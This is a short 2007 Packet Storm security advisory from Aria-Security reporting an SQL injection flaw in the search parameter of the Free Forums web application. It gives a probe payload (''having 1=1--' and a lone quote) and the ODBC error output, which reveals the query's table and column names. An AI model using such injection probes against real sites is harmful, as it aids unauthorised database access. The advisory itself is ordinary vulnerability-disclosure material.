freeforums-sql.txt

2007-11-15T00:00:00
ID PACKETSTORM:60909
Type packetstorm
Reporter The-0utl4w
Modified 2007-11-15T00:00:00

Description

                                        
                                            `http://Aria-Security.net  
Aria-Security Team  
------------------------------------  
Free Forums Sql Injection  
Vendor: http://www.nvecs.com/forums  
  
  
the search parameter hast an sql injection  
  
example:  
'having 1=1--  
  
result:  
  
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((Responses.Response ) like '%'having 1=1--%')) Order By Topics.AddDate;'.  
  
or just a simple '  
  
  
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'Topics.User like '%'%' Order By Topics.AddDate;'.  
  
Regards,  
The-0utl4w  
Credit Goes to Aria-Security Team  
`